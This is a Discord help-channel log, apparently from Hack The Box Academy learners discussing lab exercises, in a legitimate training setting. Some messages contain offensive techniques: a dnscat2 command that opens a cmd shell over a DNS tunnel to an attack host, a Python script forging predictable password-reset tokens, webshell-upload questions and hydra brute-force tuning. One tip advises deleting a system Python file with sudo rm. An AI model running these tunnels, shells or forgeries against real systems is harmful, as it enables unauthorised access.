#modules

as in that's how they created/wrote the payload

if you look in the textbox it's showing bash code

ohhhhhhh

so the code: shell section is the php code above but in bash?

no

i suggest throwing cat << 'EOF' > rce.php into explainshell

because it's using bash redirects

it's showing (a very poor way) to write code to a file

instead of using vim/vi/nano

ohhh lmao

i legit did vim and then the php command to say to it

cat (when not given a parameter) will read from stdin

the cat << 'EOF' tells cat to read from stdin until you tell it EOF (End Of File)

the actual php code is above the shell section

https://www.gnu.org/software/bash/manual/html_node/Redirections.html

thank you very much!

i hope HTB gives you kick backs for each help request you solve for their customers lol

nope

i help because i'm selfish, it helps me retain the information by teaching it to others

In the CDSA modules, the WINDOWS EVENT LOGS & FINDING EVIL for Windows Event Logs, for the question

Analyze the event with ID 4624, that took place on 8/3/2022 at 10:23:25. Conduct a similar investigation as outlined in this section and provide the name of the executable responsible for the modification of the auditing settings as your answer. Answer format: T_W_____.exe

How does an incident responder/participant know to search for Event ID 4907 after examining the Event ID 4624? I only solved it because the module gave it away. However, I want to know why they searched that event ID in the first place, what lead them to it?

perform a similar investigation

an IR knows what they're doing

so they are teaching you the way an IR would do it

investigate logon events -> investigate events related to LogOnIDs

specifically it was narrowed down that files/data was accessed/changed on that date at that timestamp

i.e. normally it wouldn't be from years ago

rather from like last week. where your EDR system would have alerted you

EDR says "hey uh, this shit is not right" and sends that info to the SOC team

SOC team then does an investigation re: logon events, to dig for info

then further digging into events that could be related

https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4907

i believe that section even gives you a decent list of the different (common) Event IDs

For example?

So a suspicious logon was alerted by the EDR, so an IR/SOC member investigates the event. They decide to check if any changes were made during the time of the suspicious login, by examining 4907 they can see any SACL changes. They discover the suspicious executable and report it. Is that pretty much a scenario they are preparing us for?

Question asks for auditing settings

pretty much

ahhhhh

see what registry and ACL changes were made

"provide the name of the executable responsible for the modification of the auditing settings as your answer"

Is the .* operator a grep operator, or a linux command line operator?

For instance, the command grep | 'abc.*ghi' should output def

But when I look at the grep man page, it shows * as matching anything preceding, and the . is nowhere to be found in their command structure

and if you weren't sure "Event ID for changing auditing settings" and you're bound to either find the MS learn page on it or some blog about it

it's regex

Okay, here's what I actually wrote, the Discord formatted it weird

.*

if you wrap it in backticks it'll show properly

Thank you! I wanted to understand the thought process behind the answer. You did an excellent job explaining it to a noobie like myself lol

What is regex?

.*

the . is regex for any character match

and the * tells it to be greedy

So is regex a grep process?

no

Or part of bash?

Regular Expressions are a broad category of things that assist with searching, and allow more precise/nuanced things and allows matching certain things

Okay, I'll have to look that up

Thank you for the clarification

it uses special notations as well

for instance \s matches any spaces

hello everyone

I'm trying to break down some of these newer commands to understand them without just blindly copy/pasting them

Someone else with target issues?

so you can do something like "\sA\s" and it will only match the letter A with no characters next to it

a lot of times the default grep is actually aliased to egrep

which is regex default

i am doing starting point and cannot find pwnbox?

usually -E is for extended RegEx stuff

I can´t connect it and my internet is ok. Reset the target doesnt work.

wrong channel; read and follow #welcome to access #starting-point

message support

already do it but take a while xd

i have tried am trying, and really want to do HTB , but getting to help discussions has led me to a 2 hour dead en

anyway, gonna wait. thanks

again this channel isn't for starting-point

well it's friday and they don't have enough staff to work support chat 24/7 so it's limited availability

i know, im gonna take a chill. Thanks again for the response.

check always if the vpn it´s connected xd

"issue" resolved 🤡

I've been seeing a fair bit recently that some people are having their vpn "randomly" disconnect. How much of it is them not being connected in the first place - who knows.

I've done the cat command for the flag on the File Inclusion skills assessment over 10 times and still no flag!

Anyone have issues with it showing up?

I checked my command against the walkthrough and it's fine.

I can quite literally see at least 10 GET requests in there but no flag!

It just says

HTTP/1.1" 200 3253 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"

After the request

That is not the flag

I'm assuming that 200 means the request was good?

I even cURLed for it and it's the same thing

Just a wall of GET requests

200 just means "OK" in status code language

This looks like the user agent header or something

i found out that running EU academy -1 is borderline impossible for me, even on ssh i have an inpute delay of up to 4s, switched to EU2 and barely any lag

Yeah, was just not giving me the flag, I already poisoned the header in the previous step. This one's annoying, it ended up being a random string of text randomly buried in the log. It wasn't even near the command I used.

Yeah that happens

Good thing there's a walkthrough otherwise I would not have known I was just supposed to try random stuff from the output as a flag, lol

I think that's the best thing HTB Academy has done lately, even though the walkthroughs are sparse I at least know I'm not going crazy if stuff isn't working.

Is there something I'm missing in terms of where the flag should have been?

I used cURL with the same result

I had the flag, just didn't know that it was the flag until I actually checked the walkthrough.

It wasn't in the HTB{} format

Likely reading the question will help you derive the answer

Sometimes answers aren't flags like the answers related to SID and such in AD modules

The question asked for a root flag in / and I found the file, performed the inclusion, but it just didn't appear with the 10+ times I did the command, only showed up once buried further back in the log file

Also not sure why it only showed up once when I did the command many times in order to see the pattern I was missing in the log

I'm wondering if this is intended functionality or a bug on the log output?

i was able to use ls to list all the directory contents and saw it in there the very first time. you're saying you saw the directory contents but the flag wasn't there, and then it appeared there after you trying 10+ times?

is this normal?

Try a dif region

No, not normal though

can someone help me remember the name of that reporting tool that HTB reconmends?

sysreptor?

https://www.hackthebox.com/blog/certification-templates

thanks. thats the one.

i couldnt for the life of me remember what it was called

i have a question from the DNS segment in the footprinting module. reguarding the FQDN's i feel like i have the anwser and maybe im just submitting the anwsers incorrectly is there someone to ask and get a second look?

sure

i cant post the screen shots in here may i dm you?

yeah

Don't include the trailing .

Yeah in the dms with supernuts i found that wasmy issue the extra .

Yeah it's like "wait... I didn't try that?"

anyone have trouble starting an instance?

the pwnbox says starting but nothing

It's been doing that a bit lately for me

Refreshing the page then waiting a minute or two works for me

mmm

In "Attacking Common Services - Medium", are the FTP services supposed to be barely functional?

dir
500 DIR not understood
ls
500 LS not understood
help
214-The following commands are recognized (* =>'s unimplemented):
 CWD     XCWD    CDUP    XCUP    SMNT*   QUIT    PORT    PASV    
 EPRT    EPSV    ALLO*   RNFR    RNTO    DELE    MDTM    RMD     
 XRMD    MKD     XMKD    PWD     XPWD    SIZE    SYST    HELP    
 NOOP    FEAT    OPTS    HOST    CLNT    AUTH*   CCC*    CONF*   
 ENC*    MIC*    PBSZ*   PROT*   TYPE    STRU    MODE    RETR    
 STOR    STOU    APPE    REST    ABOR    USER    PASS    ACCT*   
 REIN*   LIST    NLST    STAT    SITE    MLSD    MLST    

Yeah I can't get one to work. Just using my VM instead via VPN

i see, okay.

they worked fine for me

are you connected via telnet?

if so: don't

there's literally the command : ftp to connect

ftp <server> <port>{21 implied if port is not specified}

if ftp isn't installed; sudo apt install ftp

No.. i was using ftp

checks oops yeah i was using telnet

:/

now that i've reset the target a few times, the extra services aren't comping up

Yep that was it, thanks @fathom pendant.

this skill assessment is notorious for those services not showing up properly

i can't believe i was using telnet 🫢

telnet is fine for grabbing banners

but tools like ftp have built in wrapper commands

i believe the similar command would have been LIST but i'm not sure

Getting same error for past half hour

change pwnbox regions

Didn’t work
It’s been like this for the past 4 hours

well support is gonna be the way to get help

I can vouch for this

Can I ask would anyone recommend a raspberry pi to practice pen testing or learning basic/intermediate python coding?

A raspi would not be good for pentesting

for coding stuff; sure

but a LOT of pentesting tools and such require a lot more processing overhead that a raspi just can't do

Oh my

What about just for simple like absolute pen test tools or like

no

Opposite, defensive

not sure

also this channel really isn't for discussion on that topic

read and follow #welcome and you can access more of the server

Oh, Im sorry

you'll need an account at https://app.hackthebox.com to do the verification

I thought I clicked off topic general

you can't access it since your account isn't linked

or at the very least you can read, but not type there

Hi

Hi

I need help for the linux fundementals

the question is " What is the path to the htb-student's mail? " and I found the path but the answer is still wrong ?

not sure how I can upload photos on here as well. I'm quite new so I don't know how to navigate this discord.

Me too… I don’t see how they expect us to figure this stuff out with the given material.

the path is "/var/spool/mail/htb-student" but it says it's incorrect ?

im so confused

How the heck am I supposed to figure this out?
I couldn’t even find an answer on google.

so there is no spool in the answer apparently

how do you upload pics ? I can't upload any O.o

You have to register your HTB account on discord… I forgot how.

What section is that?

intro to linux

Which subsection?

System info 3rd question

/var/mail/htb-student

I don’t know how I feel about HTB Academy… 🫤

I was on Try Hack Me and it was more simple. HTB is more tough

It doesn’t seem like the material is enough to figure out the answers.
I have to google almost every answer, and sometimes still can’t find it.

had to look up a command and as you can see there is /var/SPOOL/mail/htb-student

yet the answer was wrong and you don't include spool in the answer apparently

I didn’t use that command. I forgot how I figured that one out.

had to look it up for me. Since there was no mention on how to look it up @_@

They show you in the material but it was still not quite right…

I had to change it a little bit.

Which shell is specified for the htb-student user?

the next question and I have no clue where to look besides google the answer T_T

I think I had to google that.

Pretty easy to find tho.

echo $SHELL iirc should get you the answer

it should also be in env

environment variables tend to be in all caps

so you can usually get away with env | grep SHELL

I read the whole linux pages so far and it never showed any of those commands T_T

I had to look up how to and answers unfortunately

I'll push through with learning from HTB for now and see how it goes

it's in like one of the first interactive sections they give you a whole list of commands

env (when run without args) just prints the list of environment variables

password attacks is by far the worst modules I have ever done

I think that’s a fair assessment

I see, google will guide me I guess. Woudn't even have know what that fully means

having to wait HOURS before getting your passwords is driving me insane

Im having a similar issue.
When I connect through openvpn, it seems very buggy.
It actually freezes with certain commands and actions.

sounds like someone didn't adjust their threads

also don't attack ssh ¯_(ツ)_/¯

like the 2 main rules of that module: ssh is a last resort
-t 48 is king

the longest i've had to wait has been ~30 minutes

ftp is better

but not hours

I would rather do mist all over again than doing password attacks

¯_(ツ)_/¯

i'm just providing general advice

with hydra adding -t 48 will significantly speed up the process

what is your command?

Any clues on how to filter unique paths?

ftp or smb for the linux box

Anyone has issue running the validation logic disparity docker locally on your own computer? I could not seem to see any unavailableSlots ....

Take another look at the possibilities of grep, cut, tr and sort

Well, I googled it (like most questions) and I found the answer.
But at this point I would not have the know how or intuition to have figured that out.
I’m not feeling too confident…
I can only imagine how the certification test are.

The module explains each of these tools. Play around with them and use them in all kinds of situations.

I feel you’d pretty much have to have mastered grep, cut, tr and sort already.

The module does explain, true.
But these quiz questions require practical mastery.

I always have to look up how this or that works.
But the more you play around with it, the better you get at using these tools

You won't learn a single tool by reading about it in a module.
Use these tools. Play with them. Try to find ways. And then, when you know things a little, try to solve the tasks.
Go step by step.
First of all, you need the complete HTML code.
Then filter more and more until you get to the result

Technically, the command I used with just grep, cut, tr and sort gives the wrong answer.
It gives 33

The longer list of commands I found that give the correct answer used a tool that was not covered. The “uniq” tool. Which gave 34

Is there a module that teaches you how identify websites with malicious intent?

I don't know what you ran, but with sort -u you can do exactly that

Hey, I'm a bit confused as to what they want here as there was no mention of the word "index" through the module at all and when I did the command ls -la | grep -n sudoers to get the line number of sudoers that still did not work
I feel like I'm gonna feel dumb when I find the solution but Idk what do they mean by "index"

But that gives 33

Ok, I should not be quick to send here questions cause every time I ask here I end up solving it myself like 1 minute later lol but tbf the section did not cover anything about the "index numbers"

You're not really filtering here.
You're just looking for a URL pattern. But the pattern can be different 😉
Have a look at your list.

So as not to spoil anything, I've deleted your post

The only other method I found used the “uniq” tool, and multiple iterations of sort and cut of the stdout file created from the source code.

And also a “—insecure” tool, which of course I also hadn’t heard of.

Exactly, you were just looking for a command, but you didn't work it out yourself. Honestly, you'll never learn these tools properly that way

ftp usually works

-insecure looks like an argument and not a tool

I know.
That’s what I’m saying.
I don’t feel these modules really teach you to learn the tools fully.
I’ll likely take a complete Linux administration course.

I wouldn’t know where to start with most of these questions

because that's not how you get the index number

Right, which I wouldn’t know.

take a look at ls --help or man ls to see what option can be used with ls to perhaps give index info

You can only learn such tools with a little explanation (which takes place in the module) and then an environment in which you can use these tools in practice. Both are included in the module.
But you have to use it yourself

Have a look at the help pages of the tool. This was also explained in the module

Hm… I feel maybe there should be more exercises that slowly build you up. Idk.
I feel like these quizzes just toss you in the deep end.

I’ll try to read the help pages more,

Yeah I eventually found it, but the odd this was that this question was not in the section of the ls it was in the section of "creating files and directories" so it was not immediatly obvious that I was supposed to find some arguments in ls but yeah

As I've said before, you only learn if you use the tools, play around with them, try things out.

creating or managing?

also fwiw knowing a file's index number doesn't generally help much

Creating

all that was discussed in the section was like touch and mkdir

¯_(ツ)_/¯

ohhh

yeah there's a whole list of commands in one of the sections

that's just to tell you that most if not all of the commands listed are used in some capacity throughout the module

not that that list is exclusive to that section

Where can ask about this

I'm still studying in a university

But I'm sure that it not in the list of in university of HTB,I had university email too

you can try changing your email in settings to your university email

if your uni is in their list, then you get access to the sub: otherwise you gotta message support

if you hover over the text for it it tells you to do so :)

I already read the hover

That why I'm here again

https://academy.hackthebox.com/settings -> email section: input your student email then retype email in the confirm section

There something I afraid too

Because of my country,I afraid that I may get blocked with some kind of centent

I did it

It in the list

some other brave soul suffered through the waitlist for you (if it wasn't already there)

For some reason

I felt like the fact that it in the list is a bad things too,just my feeling

?

It's not always a bad thing to be on a list

it just means someone that went to your same school either had to put in the request for the uni to be added or it was already there

i'd prefer my uni to be on HTB's List

it's a very nice list; it helps save money

Maybe I just felt bad because Ik I'm not the first

Btw about billing,it accept anything?

Well, the Academy has been around for a few years now. The chances of being the first here are pretty slim 😉

Yeah,it very supportive for students

Yeah,I already know this like 4-5 years ago
So I created an account and joined this server at a time

I just consent enough to do this now

So basically my old self is time capsule this for me

petition to turn on ssh on windows machines, im sick of this rdp lag

i just avoid modules just for this rdp nonsense

i've generally had little issues, and when i did have issues - it was due to my vpn server being dumb

suggestion: use the tcp download; switch vpn regions

no the fps lag is like if i do some change it reflects after 10 seconds

again; sounds like a connection thing -- which is usually resolved by doing what i suggested

but ssh is fine though

because ssh isn't as resource intensive, relatively speaking, than rdp

it's not having to send over packets relating to X11 (visual)data

it's just terminal output being sent back

yea why cant they just turn on ssh on windows machines then

because often you need to interact with visual elements of windows

not in most cases

even if i get rdp i just use powershell

¯_(ツ)_/¯

submit it to /feedback since you're so up in a knot about it

windows targets i've RDPd into recently have all been behaving just fine

tcp vpn be like:

can anyone help me with the skill assessment section of intro to assembly language module

¯_(ツ)_/¯

im stuck at this question

Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8-bytes on the stack with the key in 'rbx'.

ok what is the problem you facing

Anyone got updates on the pwnboxes not spawning?

uhh i got a invisible ping

wtf stop it

did you get the assembly code

yea i have it

how can i get the decoded shellcode

xor it in a loop

yeah the question kinda tells you what to do to decode it

done that

print the value

after decoding

which register, may i ask

after xoring print it

do you want to assembly code?

yep

dm

curl -X POST -d '{"search":"flag"}' -b "PHPSESSID=h2u7hte22t03983b7p4o5dqh16" -H "Content-Type: application/json" "http://94.237.49.166:31021/search.php"                                         Received content contained invalid JSON!     

pls help using cmd, windows

Which module and section is this?

https://academy.hackthebox.com/module/35/section/224

try with burpsuite maybe, terminal is hard to handle with json

I'll like a solution and reason why this isnt working btw... Yeah CMD is tough to handle especially with quotes and all

i mean you can try escaping the quotes with \

so
{\"key\":\"value\"}

or if you analyze the source is it {"key":value}

without quotes

also i just ran this, and it worked fine on my end from a linux terminal at least

try putting the data in doublequotes instead as well with the escaping

so "{\"key\":\"value\"}"

https://stackoverflow.com/a/12498151

finally

It worked, thanks so much

don't thank me thank user1683523 on stack overflow

ofc the other alternative would be putting the json data into a file and calling it with @ @json.file

xD

that's a great module

Hello, I have issues installing Crackmapexec on my local pwnbox vm

use netexec

sudo apt install crackmapexec
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
crackmapexec : Depends: python3-neo4j but it is not installable
E: Unable to correct problems, you have held broken packages.

sudo pip3 install pipx

pipx ensurepath

oh ok

lemme try

pipx install netexec

crackmapexec is no longer being maintained, the devs have forked off to netexec

very stupid issue but

sudo pip3 install pipx
error: externally-managed-environment

× This environment is externally managed
╰─> To install Python packages system-wide, try apt install
python3-xyz, where xyz is the package you are trying to
install.

If you wish to install a non-Debian-packaged Python package,
create a virtual environment using python3 -m venv path/to/venv.
Then use path/to/venv/bin/python and path/to/venv/bin/pip. Make
sure you have python3-full installed.

If you wish to install a non-Debian packaged Python application,
it may be easiest to use pipx install xyz, which will manage a
virtual environment for you. Make sure you have pipx installed.

See /usr/share/doc/python3.11/README.venv for more information.

note: If you believe this is a mistake, please contact your Python installation or OS distribution provider. You can override this, at the risk of breaking your Python installation or OS, by passing --break-system-packages.
hint: See PEP 668 for the detailed specification.

no such thing as local pwnbox btw, it's just parrotOS

https://stackoverflow.com/questions/75608323/how-do-i-solve-error-externally-managed-environment-every-time-i-use-pip-3

you can either pass the --break-system-packages flag to the pip command

I meant I installed the HTB edition of the distro

yeah, still not pwnbox

sudo rm /usr/lib/python3.11/EXTERNALLY-MANAGED this also works

okay I will try user break system packages

also netexec works the same as crackmapexec

Just install nxc. Same as cme lemme link it

same syntax just with nxc/netexec instead of cme/crackmapexec

Literally what i just told them

and nxc docs say to install with pipx

great minds think alike

yeah @fathom pendant recommended it

Yea i just saw you having the issue and before scrolling fully down, i replied

okay got pipx

I am connected to VPN to solve vulnerability assessment nessus lab but I cannot open host should solve it by the way am connected VPN

There is an issue global?

awesome ensurepath works

? wdym open host

https://ip:nessusportis how you connect to the running nessus service

sudo pipx install netexec
Fatal error from pip prevented installation. Full pip output in file:
/root/.local/state/pipx/log/cmd_2024-05-04_19.17.20_pip_errors.log

Some possibly relevant errors from pip install:
ERROR: Could not find a version that satisfies the requirement netexec (from versions: none)
ERROR: No matching distribution found for netexec

Error installing netexec.

nessus uses SSL

you don't need to run pipx with sudo

ima cat this out, the error log

it gave the same error without sudo

pipx install netexec
Fatal error from pip prevented installation. Full pip output in file:
/home/apu/.local/state/pipx/log/cmd_2024-05-04_19.16.59_pip_errors.log

Some possibly relevant errors from pip install:
ERROR: Could not find a version that satisfies the requirement netexec (from versions: none)
ERROR: No matching distribution found for netexec

Error installing netexec.

Include the error log output

https://www.netexec.wiki/getting-started/installation/installation-on-unix follow these instructions

sorry i forgot they do it slightly differently

yeah just a sec
@fathom pendant Ill follow the instructions and try again

it's pipx install git+https://github.com/Pennyw0rth/NetExec

oh okay running this

get timed out nerd

But yea nxc is same cme, same syntax etx

but yeah be careful with @ too many people

it's the cooler cme

How long is the timeout?

@solid python can we save @north bramble from his honest mistake?

probably like a minute or 10

idk not my bot not my circus ¯_(ツ)_/¯

buahahaha

Still a month away from having the time to take the test...

I think C1oud took off for the moment

Sorry what am I doing

I made breakfast

Ohh he timed himself out

Unblock @yash - we were helping him and he put too many @s

thanks @solid python

Consider him rescued

I was thanking you all for helping me kek

Lol

Be sure to be thankful for only a few people at a time

Hey can anybody help me with the AD enumeration and attack module

With the password policy chapter's lab

I tried all the tools and commands and still could not get any result

What question and what have you tried?

The question was to find the password policy

but using the ip of ens22 with the command provided for linux without credentials

i couldn't get any output

also on scanning the network of ens22 i found ssh and rdp running, nothing more than these

Am I good to ask about a beginner problem here that isn't necessarily module related? I guess I could say it's a linux fundamentals filtering thing is as close as it gets.

Hi, I have a question about Pass The Ticket on Windows (Password Attacks) ; I completed the module but I have a question about the share access using ptt. Can I DM someone ? (or here but it will spoil)

i did it yesterday

you can DM me

Anyone here solved Protected Archives? I'm getting crazy, when i try to open the Notes.zip it says "Is not archive"

i downloaded it using nc and also python http.server

Not sure what you tried, you;ll need to provide more detail.

If it's a simple question it wouldn't hurt to just ask

You can try SCP if you feel it was a failed transfer. On your box just use SSH creds:
scp username@remote:/file/to/send /where/to/put

What are you doing that it says not archive?

Ah, sorry I have solved that problem in particular but I figured it'd be worth knowing if I can ask in future anyways. I was trying to grep through permission denieds in some find results, got fixated on why grep doesn't work but I could just 2>/dev/null. 🙃

hey, sorry, i know this is old. i got the answer but i kinda cheated because it didn't add up. i added the 19 that i found in the first zone, but the next one had 5 records (same subdomain as the txt question). it was wrong, i got frustrated and impatient so i just incremented by 1 and hit submit till i got it. i felt bad after a bit and really would like to understand why the answer was what it was when 5+19!=[answer].

Does anyone know or have a walkthrough for this https://academy.hackthebox.com/module/17/section/60? The question is:

Use the credentials for the admin user [admin:sunshine1] and upload a webshell to your target. Once you have access to the target, obtain the contents of the 'flag.txt' file in the home directory for the 'wp-user' directory.

I've already successfully modified the 404.php file (In the Twenty Seventeen theme, but my problem is that I don't know how to upload a webshell in WordPress. I tried adding new plugins in a compressed file or adding new media with the same format (.zip, .txt, .php), but I received the same error due to security measures.

If you upgrade to an annual subscription you will get guided learning

also, don't try getting a reverse shell, but instead get code execution allowing you to read contents on the target

that's too expensive for me. Only a student here... 😦

All my Pwnbox sessions are over 100,000ms. Is this a general issue or only on my side?

Pls guys I’m stuck on unconditional branching task of intro to assembly language, here it’s the link to the question pls need help https://www.reddit.com/r/hackthebox/s/tRNbNjm24A

hi the servers are all filled and latency is at an all-time high I think

when will HTB Academy servers be available again?

I'm waiting to finish the last section of information gathering module

hey I am using web attacks and im trying to run this command but it says that port 80 is already in use what can I do here

use another port

or kill the service already using port 80

can I use the default port and it will still work

its 8000

you can start the webserver on any port you want

just make sure when you download it you include the port

I mean Im using it for a website in the module web attack section local file disclosure

it does not matter what port you run the server on, just make sure when calling to the url to include the correct port instead of the default port (80)

oh thanks

Hey please need help
If i buy gold or premium monthly subscription does include tier 3 and 4?

I got it now

thats cool

Where are prolabs-offshore channel

Just finished Password Attacks Module, it was brutal but super fun

Learnt alot

Read and follow #welcome and then you can access prolabs like #prolabs-dante etc

Because the second one has > 5

No one it’s helping me on this intro to assembly language module, pls I’m stuck at unconditional branching task

hello someone can explain this error pls for challenge https://academy.hackthebox.com/module/158/section/1436

Execution policies are prevented it from running

As it literally states in the red text

Hi i need help assembly language working on the unconditional module using jmp (unconditionals). I literally place the jmp between every line and its either exiting normally or its giving me the hex rbx value of 0x1000000 which is not correct.

ok i read it but why i've got this while as I try to reproduce what the course asks of me

Maybe running powershell as admin will make it work

You need to bypass execution policy

That too

powershell stops scripts from running unless they are digitally signed. the script you're trying to run isn't signed, so you need to bypass the execution policy to allow it to run.

mhmm okok but they don't tell you how to get around this kind of problem.

Google can

Here it’s the link to the question #1236401511953727529 message

Anyone here already finished Password attacks PtT Linux?

I mean the people that have the fancy swords next to their name definitely have

https://dontasktoask.com

i need help with Login Brute Forcing : Skills Assessment/
Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?

i did everything i swear i did it with burp / curl / hydra nothing working ones i login it refresh the page and doesn't login

Did you bruteforce the user/password?

yes

i did everything

if you have the username and password, you can simply log in. you can DM me what you have, my guess is you don't have the correct credentials.

can someone help with the SECURITY MONITORING & SIEM FUNDAMENTALS htb

im confused on how im supposed to do it

where am i supposed to Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Discover".

ion see it i looked the http and nothng showed up i get a error

Did you spawn the container? It should provide you an IP to use

yes

i used it and on the fire fox it shows error

Okiedokie, let's see

http//:[10.129.250.110]:5601

is that how im post to put it

remove the brackets

i did that too

http://10.129.250.110:5601

am i not post to put it on fire fox?

you should show the error like g0blin said then, also are you on the vpn?

no

that's your problem, you need to be on the vpn

Oh yeah.. you need to either be connected to the lab via the VPN or be working via the Pwnbox

im on the pwn boc

it worked

https://tenor.com/view/muppet-family-christmas-muppets-sesame-street-fozzie-fozzie-bear-gif-15746557

Cool 🙂

can i run that site ony my kali mahine and it would work ?

aslong as i have the vpn

If you switch to the OVPN connection you can work on your kali machine

https://academy.hackthebox.com/vpn

That'll provide you with an OVPN config file to use

ahh okay thank you so much

I been stuck on that for the longest and i feel slow

All good 🙂

is it the correct place for me to ask question about a cpts path module?

Yes

This lesson is about understanding how DNS works.
Take a closer look at this link.
https://www.cloudflare.com/learning/dns/glossary/dns-zone/
It's about finding all zones and understanding how to configure zones.

I have deleted your post so as not to spoil anything.

That link is very helpful, thanks

I tried usermod —lock , and usermod -L
I don’t know what you want from me HTB. 😪

Make sure that you do not have any spaces at the beginning or end of the string
Reload the page in the browser

It’s not working…
Though it seems to be turning my double dash into a long dash. Could this be an issue?

If you type two hyphens into the form field, does your browser turn them into a different character?

Only the option is searched for, not the entire command

When I type two hyphens it seems to be turning it into one long hyphen.

you are also asked about the option not the whole command

Try it with another browser

🙄
Got it… thanks.

i've noticed with some apps you can paste the two dashes in without them combining, if you want to try pasting them instead of typing them in.

Good morning family, is they any here who have gone through the intro to assembly language module ? I need a help in one of the sections it’s holding me

Hi, sorry i have a quick question, if someone can help me it would be cool.
I'm currently at the Broken Authentication module, section: Predictable Reset Token. I'm trying to create a script in order to generate a valid reset token but it doesn't work properly and i don't know why yet

import hashlib
from datetime import datetime
import sys

def datetime_to_timestamp(datetime_str):
    format = "%Y-%m-%d %I:%M:%S%p"
    datetime_obj = datetime.strptime(datetime_str, format)
    timestamp = int(datetime_obj.timestamp() * 1000)
    return timestamp

def generate_reset_token(username, datetime_str):
    timestamp = datetime_to_timestamp(datetime_str)
    data = username + str(timestamp)
    token = hashlib.md5(data.encode()).hexdigest()
    return token, timestamp

if __name__ == '__main__':
    try:
        user = sys.argv[1]
        generated = sys.argv[2]
        token, ts = generate_reset_token(user, generated)
        print(f"Token: {token}, Timestamp: {ts}")
    except IndexError:
        print(f"Usage: {sys.argv[0]} <username> <datetime>")```

Idk if maybe it's because of the milliseconds or something like that

Hi all ! I'm currently working on the Linux Privilege Escalation module but the boxes for exercices are rnning extremely low, disconnecting very often, impossible to work with them 😦

#modules message

@next bronze thanks mate, I'll check that

Openvpn is extremely shoddy…
For some reason I thought it would perform better than the pwnbox, but it’s practically unusable…

#general message

Try to change your DNS Resolver to 1.1.1.1

PLEASE DEVS! Fix connectivity issues on Citrix Breakout Windows Privileges Esc module it is horrible! I wasted a few hours only for reconnecting over and over. Thank you.

+1

Will AI really taking our jobs in Cybersecurity? 🤔🤔

Where do you work and what's your job title?

I was on web development. Currently I’m studying cybersecurity and just worried about all this AI staff.

can anyone help me with the second question of skill assessment section in intro assembly lang module

Personally I think your worry is just wasting processing cycles and not good for your nervous system. Just focus on what you love and having a roadmap of skills acquisitions that you're working towards. Use AI to your benefit. It's also a skill you can improve upon over time.

Hey guys,

i have an issue with the "DNS Tunneling with Dnscat2" section of "pivoting and tunneling" module.
When i want to use dnscat2.ps1 on the host i rdp into, i get the following error message. Any ideas what the reason might be? On my attack host, i get a new window created, but cant interact with it. I also used powershell -ep bypass, as mentioned by others here.

sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache

`Import-Module .\dnscat2.ps1

Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd`

Wait you use 10.10.14.18? I thought my attack host IP goes there. When i use 10.10.14.18 i get an error message

Hey guys, I'm doing the "Pivoting, Tunneling and Port Forwarding" module and I'm just reading the "Remote/Reverse Port Forwarding with SSH" lesson, and here, it uses msfvenom and then the reverse port forwarding, but would be not possible to perform the same pivoting with the Dynamic port forwarding? I'm trying to understand if would be possible and in case why would not be possible. ALso because the dynamic forwarding is used with socks with xfreerdp, so, by using dynamic + socks could be possible to perform a reverse shell?
Sorry if it is a stupid question, but I'm learning this topic 🙃

anyone

oh guys i got it

This is just what the module says, but it´s not working for me wich is why i asked

👋 is there an issue with authenticating to the windows AD servers using htb-student:Academy_student_AD! by any chance? I've switched vpn and reset boxes multiple times and I have the same issue, wrong password. I can try to debug further, but I'm just asking before going further.

oh ok, you just have to wait a long time after the machine boots then, it's working with psexec, I said nothing!

i have an issue with the whitelisted filter section under the file upload attacks module and when i try to fuzz for allowed extension i managed to get a one but when i try to access it on browser i get 404 not found why is so? what am i doing that prevents me from accessing the shell?

edit: i've managed to find the shell path however its just the dot extension and it gives me the content inside my shell without being able to run it

is it my computer or is the** target vm for linux privilege escalation **lagging super badly (fyi I have been resetting the target vm and waiting for at least 5 mins before i ssh into ti)

The windows machines just have connection issues in generald, i´m struggling to get proper connections for ages, and never found a solid solution for it.

My go to advise is using pwnbox, but even then the connection dies alot

Might be HTB traffic or ur system
How many gb of ram do you have on ur system?

im using target vm on pwnbox

so im thinking its the HTB traffic

thats annoying

Hi, who worked on the Advanced SQL Injections module?
There are questions that I cannot overcome.😔
Who can help me with them?

.

Hello. I am CPTS certified. How can I get sword icon ? 😄 #sword

#cpts message

No, the goal of that module is to make a route available from the second server to you. This way you can use other techniques with the tools available on your host.

but in general would be possible to perform a reverse shell using the dynamic + socks? or could something block it?

No, the point of the module is to create a route back to you. Your methods you keep suggesting creates a route for you to the host but not the other way around. You can't catch a revshell with your methods.

ah okok, thanks 🙃

guys my student subscription ended yesterday i didn't know it will automatically renew i deactivated it is there a way to refund?

Reach out to support, the green bubble on the site.

Thx ;D

Reach out to support

rdp on the analyzing windows logs is a nightmare

I'm just doing now the DNS module and I start dnscat2 using ruby and putting the attack host IP and it worked.
Which issue do you have?
But I don't know why, but after the first command, the client crash

Hello everyone,

I'm a beginner following the HTB Academy in the learning process module. I'm having some difficulty with the question "What is the difference between the two learning progress numbers above?" I answered 36.7 using the clue 37.7 - 1.00.

Could anyone help me understand if my answer is correct or if there's something I need to fix?
link modules : https://academy.hackthebox.com/module/9/section/56
Thank you for your assistance!

The issue is on the client side. I have a screenshot above. The encryption doesnt seem to work, or it could have to do with HTB instable connections on windows hosts.

I could read the flag anyway so its fine, but it´s always frustrating to not know, if you actually made a mistake or if it´s yet again a techniqual issue of the platform

Is the RDP to DC1 pretty unstable for the CDSA modules?

"Connect to DC1 as 'htb-student:HTB_@cademy_stdnt!' doesnt seem to like the credentials

Not done the module in question, but you may have to specify a domain for the htb-student account

So either Domain/username or username@domain

You put htb_student not htb-student

That would do it.

welll

happens to the best of us 😂

hi

i need help

password attack medium lab

It helps us help you if you actually ask your question

i don’t what i need to do after download the doc.zips y desencryp

?

Obviously crack the pw for the zip file

Hi im stuck in this Question
